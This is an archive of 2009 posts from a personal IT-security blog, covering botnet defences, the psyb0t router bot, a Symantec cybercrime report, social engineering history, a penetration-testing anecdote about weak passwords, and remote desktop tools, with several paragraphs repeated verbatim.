If you have a corperate Anti Virus system, someone should be running reports on your clients, making sure they are checking in and getting the latest updates. The reason for all of this is because again these malware are turning off AV systems or hindering thier ability to do updates.
All that done and you should be in a good position to fight off these types of attacks. This is not everything you need but I find that these 3 steps will help most. Of course it doesn't hurt to have an IPS/IDS on the netowrk as well; stopping these things before they get on your network to begin with is also a great step!
If you are interested in learning more about bots, I found the following links posted to a email list I am a part of. It is a series of presentations from the folks over at Watchguard. Watchguard is not my first choice of security appliance, but there are many that are worse. The information contained in this series is good for an introduction into bots from a high level. Enjoy and of course if you have questions you can ask me directly. I am glad to help you formulate a plan to protect your network for free. Yes free! OK enough with the shameless plug :) I will probably be posting more as I dive deeper into the realm of bots and botnets. Keep your eyes out!
Watchguard Botnet Series:
Part 1
Part 2
Part 3
Botnet Source Code for Overachievers
So sure they work on IRC in a lot of cases. IRC is a pretty straight forward protocol that many of us are probably at least a little familiar with. What though are the reasons for bots, techniques of bots and how can we protect against them? I would go as far as recommending a three step process:
1. Egress filtering at your edge firewall. This is going to block any traffic that you do not trust. Most people block untrusted communication from the Internet in, but I'm talking from the LAN out! Depending on your firewall maker, you may only get a good port blocker, which should help in a lot of cases, but if you have a firewall that is doing deep packet inspection, you can get most of your problem traffic stopped before these bots can phone home.
2. Update your OS and applications! This may seem like a no brainer, and you may say "I have automatic updates on". The problem is that many of these bots and other malware are turning that service off or tricking that process into thinking it's checking in, when it really isn't. Also notice that I said applications as well. As much as we all like to bash Microsoft for being insecure, a lot of new techniques are being used to take advantage of thrid party applications as well because these tend to be ignored or harder to update automatically.
3. Update your AntiVirus. This is twofold. A lot of people think they are fine with that Norton 2003, (mentioned for example purposes only), because they are getting their signature updates still. The problem with that is these malware are becoming polymorphic. These types of malware cannot be noticed with general signatures. They have to be caught by recognizing abnormal traffic. The newer AV engines are able to view this type of behavior through other signatures and IPS functionality. If you are not also updating your AV engine, you might as well not update your signatures either.
OK, thats probably going too far, but it is important. We also need to make sure we are getting updates. Check the definition file date from time to time to ensure it is up to date. I have my AV update a couple times a day, in most cases I'm suprised to see a definition file that is more than 24 hours old.
If you have a corperate Anti Virus system, someone should be running reports on your clients, making sure they are checking in and getting the latest updates. The reason for all of this is because again these malware are turning off AV systems or hindering thier ability to do updates.
All that done and you should be in a good position to fight off these types of attacks. This is not everything you need but I find that these 3 steps will help most. Of course it doesn't hurt to have an IPS/IDS on the netowrk as well; stopping these things before they get on your network to begin with is also a great step!
If you are interested in learning more about bots, I found the following links posted to a email list I am a part of. It is a series of presentations from the folks over at Watchguard. Watchguard is not my first choice of security appliance, but there are many that are worse. The information contained in this series is good for an introduction into bots from a high level. Enjoy and of course if you have questions you can ask me directly. I am glad to help you formulate a plan to protect your network for free. Yes free! OK enough with the shameless plug :) I will probably be posting more as I dive deeper into the realm of bots and botnets. Keep your eyes out!
Watchguard Botnet Series:
Part 1
Part 2
Part 3
Botnet Source Code for Overachievers
Wednesday, March 25, 2009
psyb0t
Is it a robot from a sci-fi book or a character from Futurama? Nope, it's worse! This is an irc bot that infects routers. You read it right. The idea is that people a. leave their routers on all of the time, even though they shut down their PCs, and b. most people don't keep an eye on their router cuz it should just run. It appears to be doing so by taking advantage of vulnerabilites in applications that run on the router such PHPMyAdmin, or MySQL for example. You can read more at the following two links: (at the time of this writing I couldn't get to the first which is the group noted for discovery, the second includes exerpts from members of that group)
Dronebl
irc-junkies
I can't say I'm suprised. I worked on a contract for a company, who shall remain nameless to protect the innocent, who was running FatPipe load balancers which were taken over by a bot, almost 2 years ago. We really didn't do analysis on it to know where it was going but I know it was bot activity as blocking normal IRC ports on the core router stopped the traffic. It's a great but fiendish idea. Make sure your passwords are not easy to guess and keep up on the software/firmware updates for your routers! There are some suggestions for lowering your probability to infection on the Dronebl site.
Dronebl
irc-junkies
I can't say I'm suprised. I worked on a contract for a company, who shall remain nameless to protect the innocent, who was running FatPipe load balancers which were taken over by a bot, almost 2 years ago. We really didn't do analysis on it to know where it was going but I know it was bot activity as blocking normal IRC ports on the core router stopped the traffic. It's a great but fiendish idea. Make sure your passwords are not easy to guess and keep up on the software/firmware updates for your routers! There are some suggestions for lowering your probability to infection on the Dronebl site.
Monday, March 23, 2009
Symantec Underground Economy
Symantec has released their report on the activity going on in the computer underworld. It doesn't claim to have a profile on all cybercrime in the world, but it is a good sample of the things that are being seen, sold, bought etc. You can check it out here:
Symantec Underground Economy
You do not have to register to read it, just answer 2 simple questions. I'll probably post a blog tomorrow on what I find interesting in the document after I have some time to read it.
Symantec Underground Economy
You do not have to register to read it, just answer 2 simple questions. I'll probably post a blog tomorrow on what I find interesting in the document after I have some time to read it.
Tuesday, March 17, 2009
Social Engineering; The new thing?
Social engineering has received a lot of media in the recent past in regards to security. Just how new is this technique? I'm sure arguments could date this back to biblical times when Jacob obtained Esau's firstborn privileges by giving him stew or even back to the serpent duping Eve into not following God's commands.
What about examples in more recent times? Again, I'm sure there are plenty of examples, but I stumbled on this one. It is a document released under the freedom of information act, talking about how FBI agents can and should use social engineering in their investigations.
FBI Social Engineering Manual Revealed!
This document is from 1956. There is no ground breaking stuff here, but it is an interesting read to see that even the man is aware of how well this technique works.
Credit for discovery goes to Mr. Kevin Mitnick, surprise :)
What about examples in more recent times? Again, I'm sure there are plenty of examples, but I stumbled on this one. It is a document released under the freedom of information act, talking about how FBI agents can and should use social engineering in their investigations.
FBI Social Engineering Manual Revealed!
This document is from 1956. There is no ground breaking stuff here, but it is an interesting read to see that even the man is aware of how well this technique works.
Credit for discovery goes to Mr. Kevin Mitnick, surprise :)
Monday, March 16, 2009
Always seems to be the simple things...
I just wanted to post a thought I had from this morning. For the past 4 major security projects I had to do, it took longer than it should have. The reason? Simple, I always out think the problem at hand. In all 4 cases the solution to getting into the box or recovering the password or testing for cross site scripting, or mapping the network has been so easy that I missed it. I'm throwing everything but the kitchen sink at this MS box this morning. Intense injection attempts and other remote exploits and 20 seconds in Hydra got me administrator user access because the password was really just that weak.
It seems that I just want to apply all of the cool new techniques available and the good old password guessing, reading documents received from a client, or simple trial and error produced the access needed. There was no need for rainbow tables attacks or complex sploits to get what I neeed. I just needed to start at the basics.
Don't forget the basics! As much as we would like to think "naaw, it can't be that simple", it turns out to be just that. Don't get me wrong pwning a box with the latest greatest 0day is cool, but when your doing this for a living and just need to get it done, don't leave out the simple stuff cuz it's not 733t!
It seems that I just want to apply all of the cool new techniques available and the good old password guessing, reading documents received from a client, or simple trial and error produced the access needed. There was no need for rainbow tables attacks or complex sploits to get what I neeed. I just needed to start at the basics.
Don't forget the basics! As much as we would like to think "naaw, it can't be that simple", it turns out to be just that. Don't get me wrong pwning a box with the latest greatest 0day is cool, but when your doing this for a living and just need to get it done, don't leave out the simple stuff cuz it's not 733t!
Thursday, March 12, 2009
Remote Desktops
So this isn't really security related but I want to keep up on this blog so I figured I would put down some things I found today. I'm not sure how many of you use the Remote Desktops MMC to connect to multiple Windows boxes. I like the idea of having all of my connections in one place but man do I hate that you cannot sort them or group them in any way.
That said, I found some tools that add some nice features. RoyalTS (http://www.code4ward.net/main/) and Visionapp Remote Desktop 2009 (http://www.visionapp.com/). Now I haven't used both for very long, only today actually, but here are my findings so far.
I really like RoyalTS 6.1. It has a kick butt feature of being able to pull computer management, event log and more from a right click menu. You can also add your own custom WIMC commands to add too the toolset. The biggest problem with 6.1 is that it's $30 bucks! I'm having trouble justifying spending money on a tool like this. The free version is limited to only 10 connections and with more than 100 servers to connect to, not very helpful.
Visionapp is very nice in the user interface arena. It is easy to group your connections into logical folders. RoyalTS does this too but it is a little less pretty. One of the best features this one has over the RoyalTS is that you can import the systems via AD query. This made it a cake walk to pull all of the needed systems into one place. Alas no tool set.
It's quite odd that I have immediately set the bar for the need of a wimc toolset in such a tool when only this morning I barely had a place to connect to multiple systesm from one place :) More to come after a full evaluation. If any of you know of like applications, especially free, let me know in a comment!
Curt
That said, I found some tools that add some nice features. RoyalTS (http://www.code4ward.net/main/) and Visionapp Remote Desktop 2009 (http://www.visionapp.com/). Now I haven't used both for very long, only today actually, but here are my findings so far.
I really like RoyalTS 6.1. It has a kick butt feature of being able to pull computer management, event log and more from a right click menu. You can also add your own custom WIMC commands to add too the toolset. The biggest problem with 6.1 is that it's $30 bucks! I'm having trouble justifying spending money on a tool like this. The free version is limited to only 10 connections and with more than 100 servers to connect to, not very helpful.
Visionapp is very nice in the user interface arena. It is easy to group your connections into logical folders. RoyalTS does this too but it is a little less pretty. One of the best features this one has over the RoyalTS is that you can import the systems via AD query. This made it a cake walk to pull all of the needed systems into one place. Alas no tool set.
It's quite odd that I have immediately set the bar for the need of a wimc toolset in such a tool when only this morning I barely had a place to connect to multiple systesm from one place :) More to come after a full evaluation. If any of you know of like applications, especially free, let me know in a comment!
Curt
Wednesday, March 11, 2009
New Blog!
So this will be my attempt to share the things that I am learning through this endless journey of IT Security. I hope to post details of projects I'm doing, thoughts I am having related to IT security and any news or interesting articles that I stumble upon. I hope to share at least one of these things daily.
Check back soon!
Check back soon!
Subscribe to:
Posts (Atom)
